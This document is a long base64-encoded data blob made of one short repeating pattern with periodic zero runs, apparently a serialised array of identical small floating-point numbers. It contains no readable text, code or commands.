JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JT